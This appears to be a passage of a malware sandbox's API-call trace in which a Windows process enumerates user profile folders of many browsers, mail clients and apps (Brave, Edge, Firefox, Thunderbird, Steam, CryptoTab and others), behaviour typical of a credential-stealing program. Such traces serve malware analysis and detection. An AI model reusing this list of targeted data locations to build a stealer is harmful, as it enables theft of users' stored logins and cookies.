lpSrc="%USERPROFILE%\\AppData\\Local\\360Browser\\Browser\\User Data", lpDst=0x43e9a4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\360Browser\\Browser\\User Data") returned 0x3e [0280.924] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43ea3c) returned 1 [0280.924] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\360Browser\\Browser\\User Data", nBufferLength=0x105, lpBuffer=0x43e51c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\360Browser\\Browser\\User Data", lpFilePart=0x0) returned 0x3d [0280.924] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\360Browser\\Browser\\User Data\\*", lpFindFileData=0x43e7ec | out: lpFindFileData=0x43e7ec*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0280.924] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e7ac) returned 1 [0280.926] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x43e9a4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0280.926] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Maxthon3\\User Data", lpDst=0x43e9a4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Maxthon3\\User Data") returned 0x34 [0280.926] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43ea3c) returned 1 [0280.926] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Maxthon3\\User Data", nBufferLength=0x105, lpBuffer=0x43e51c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Maxthon3\\User Data", lpFilePart=0x0) returned 0x33 [0280.926] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Maxthon3\\User Data\\*", lpFindFileData=0x43e7ec | out: lpFindFileData=0x43e7ec*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0280.927] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e7ac) returned 1 [0280.928] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x43e9a4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0280.928] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\K-Melon\\User Data", lpDst=0x43e9a4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\K-Melon\\User Data") returned 0x33 [0280.929] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43ea3c) returned 1 [0280.929] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\K-Melon\\User Data", nBufferLength=0x105, lpBuffer=0x43e51c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\K-Melon\\User Data", lpFilePart=0x0) returned 0x32 [0280.929] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\K-Melon\\User Data\\*", lpFindFileData=0x43e7ec | out: lpFindFileData=0x43e7ec*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0280.929] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e7ac) returned 1 [0280.930] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x43e9a4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0280.930] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Sputnik\\Sputnik\\User Data", lpDst=0x43e9a4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Sputnik\\Sputnik\\User Data") returned 0x3b [0280.930] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43ea3c) returned 1 [0280.930] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Sputnik\\Sputnik\\User Data", nBufferLength=0x105, lpBuffer=0x43e51c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Sputnik\\Sputnik\\User Data", lpFilePart=0x0) returned 0x3a [0280.931] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Sputnik\\Sputnik\\User Data\\*", lpFindFileData=0x43e7ec | out: lpFindFileData=0x43e7ec*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0280.931] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e7ac) returned 1 [0280.932] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x43e9a4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0280.932] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Nichrome\\User Data", lpDst=0x43e9a4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Nichrome\\User Data") returned 0x34 [0280.932] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43ea3c) returned 1 [0280.933] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Nichrome\\User Data", nBufferLength=0x105, lpBuffer=0x43e51c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Nichrome\\User Data", lpFilePart=0x0) returned 0x33 [0280.933] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Nichrome\\User Data\\*", lpFindFileData=0x43e7ec | out: lpFindFileData=0x43e7ec*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0280.933] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e7ac) returned 1 [0280.934] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x43e9a4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0280.934] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\CocCoc\\Browser\\User Data", lpDst=0x43e9a4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\CocCoc\\Browser\\User Data") returned 0x3a [0280.934] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43ea3c) returned 1 [0280.934] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\CocCoc\\Browser\\User Data", nBufferLength=0x105, lpBuffer=0x43e51c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\CocCoc\\Browser\\User Data", lpFilePart=0x0) returned 0x39 [0280.935] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\CocCoc\\Browser\\User Data\\*", lpFindFileData=0x43e7ec | out: lpFindFileData=0x43e7ec*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0280.935] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e7ac) returned 1 [0280.936] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x43e9a4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0280.937] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Uran\\User Data", lpDst=0x43e9a4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Uran\\User Data") returned 0x30 [0280.937] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43ea3c) returned 1 [0280.937] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Uran\\User Data", nBufferLength=0x105, lpBuffer=0x43e51c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Uran\\User Data", lpFilePart=0x0) returned 0x2f [0280.937] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Uran\\User Data\\*", lpFindFileData=0x43e7ec | out: lpFindFileData=0x43e7ec*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0280.937] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e7ac) returned 1 [0280.938] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x43e9a4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0280.939] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Chromodo\\User Data", lpDst=0x43e9a4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Chromodo\\User Data") returned 0x34 [0280.939] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43ea3c) returned 1 [0280.939] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Chromodo\\User Data", nBufferLength=0x105, lpBuffer=0x43e51c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Chromodo\\User Data", lpFilePart=0x0) returned 0x33 [0280.939] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Chromodo\\User Data\\*", lpFindFileData=0x43e7ec | out: lpFindFileData=0x43e7ec*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0280.939] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e7ac) returned 1 [0280.940] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x43e9a4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0280.940] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Mail.Ru\\Atom\\User Data", lpDst=0x43e9a4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Mail.Ru\\Atom\\User Data") returned 0x38 [0280.941] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43ea3c) returned 1 [0280.941] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Mail.Ru\\Atom\\User Data", nBufferLength=0x105, lpBuffer=0x43e51c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Mail.Ru\\Atom\\User Data", lpFilePart=0x0) returned 0x37 [0280.941] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Mail.Ru\\Atom\\User Data\\*", lpFindFileData=0x43e7ec | out: lpFindFileData=0x43e7ec*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0280.941] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e7ac) returned 1 [0280.942] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x43e9a4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0280.942] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\BraveSoftware\\Brave-Browser\\User Data", lpDst=0x43e9a4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\BraveSoftware\\Brave-Browser\\User Data") returned 0x47 [0280.942] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43ea3c) returned 1 [0280.943] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\BraveSoftware\\Brave-Browser\\User Data", nBufferLength=0x105, lpBuffer=0x43e51c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\BraveSoftware\\Brave-Browser\\User Data", lpFilePart=0x0) returned 0x46 [0280.943] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\BraveSoftware\\Brave-Browser\\User Data\\*", lpFindFileData=0x43e7ec | out: lpFindFileData=0x43e7ec*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0280.943] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e7ac) returned 1 [0280.944] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x43e9a4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0280.944] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Microsoft\\Edge\\User Data", lpDst=0x43e9a4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Edge\\User Data") returned 0x3a [0280.944] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43ea3c) returned 1 [0280.944] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Edge\\User Data", nBufferLength=0x105, lpBuffer=0x43e51c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Edge\\User Data", lpFilePart=0x0) returned 0x39 [0280.945] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Edge\\User Data\\*", lpFindFileData=0x43e7ec | out: lpFindFileData=0x43e7ec*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0280.945] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e7ac) returned 1 [0280.946] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x43e9a4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0280.946] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\NVIDIA Corporation\\NVIDIA GeForce Experience", lpDst=0x43e9a4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\NVIDIA Corporation\\NVIDIA GeForce Experience") returned 0x4e [0280.946] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43ea3c) returned 1 [0280.946] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\NVIDIA Corporation\\NVIDIA GeForce Experience", nBufferLength=0x105, lpBuffer=0x43e51c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\NVIDIA Corporation\\NVIDIA GeForce Experience", lpFilePart=0x0) returned 0x4d [0280.947] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\NVIDIA Corporation\\NVIDIA GeForce Experience\\*", lpFindFileData=0x43e7ec | out: lpFindFileData=0x43e7ec*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0280.947] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e7ac) returned 1 [0280.948] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x43e9a4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0280.948] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Steam", lpDst=0x43e9a4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Steam") returned 0x27 [0280.948] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43ea3c) returned 1 [0280.948] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Steam", nBufferLength=0x105, lpBuffer=0x43e51c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Steam", lpFilePart=0x0) returned 0x26 [0280.948] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Steam\\*", lpFindFileData=0x43e7ec | out: lpFindFileData=0x43e7ec*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0280.949] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e7ac) returned 1 [0280.950] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x43e9a4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0280.950] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\CryptoTab Browser\\User Data", lpDst=0x43e9a4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\CryptoTab Browser\\User Data") returned 0x3d [0280.950] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43ea3c) returned 1 [0280.950] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\CryptoTab Browser\\User Data", nBufferLength=0x105, lpBuffer=0x43e51c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\CryptoTab Browser\\User Data", lpFilePart=0x0) returned 0x3c [0280.951] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\CryptoTab Browser\\User Data\\*", lpFindFileData=0x43e7ec | out: lpFindFileData=0x43e7ec*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0280.951] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e7ac) returned 1 [0280.990] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x43ea1c, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0280.990] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Roaming\\Mozilla\\Firefox", lpDst=0x43ea1c, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Mozilla\\Firefox") returned 0x33 [0280.990] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43eab4) returned 1 [0280.991] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Mozilla\\Firefox", nBufferLength=0x105, lpBuffer=0x43e594, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Mozilla\\Firefox", lpFilePart=0x0) returned 0x32 [0280.991] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Mozilla\\Firefox\\*", lpFindFileData=0x43e864 | out: lpFindFileData=0x43e864*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0280.991] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e824) returned 1 [0280.993] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x43ea1c, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0280.993] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Roaming\\Waterfox", lpDst=0x43ea1c, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Waterfox") returned 0x2c [0280.993] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43eab4) returned 1 [0280.993] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Waterfox", nBufferLength=0x105, lpBuffer=0x43e594, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Waterfox", lpFilePart=0x0) returned 0x2b [0280.993] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Waterfox\\*", lpFindFileData=0x43e864 | out: lpFindFileData=0x43e864*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0280.993] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e824) returned 1 [0280.994] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x43ea1c, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0280.994] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Roaming\\K-Meleon", lpDst=0x43ea1c, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\K-Meleon") returned 0x2c [0280.995] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43eab4) returned 1 [0280.995] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\K-Meleon", nBufferLength=0x105, lpBuffer=0x43e594, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\K-Meleon", lpFilePart=0x0) returned 0x2b [0280.995] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\K-Meleon\\*", lpFindFileData=0x43e864 | out: lpFindFileData=0x43e864*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0280.995] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e824) returned 1 [0280.996] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x43ea1c, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0280.997] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Roaming\\Thunderbird", lpDst=0x43ea1c, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Thunderbird") returned 0x2f [0280.997] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43eab4) returned 1 [0280.997] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Thunderbird", nBufferLength=0x105, lpBuffer=0x43e594, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Thunderbird", lpFilePart=0x0) returned 0x2e [0280.997] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Thunderbird\\*", lpFindFileData=0x43e864 | out: lpFindFileData=0x43e864*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0280.997] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e824) returned 1 [0280.998] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x43ea1c, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0280.998] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Roaming\\Comodo\\IceDragon", lpDst=0x43ea1c, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Comodo\\IceDragon") returned 0x34 [0280.998] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43eab4) returned 1 [0281.046] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Comodo\\IceDragon", nBufferLength=0x105, lpBuffer=0x43e594, lpFilePart=0x0 | out: 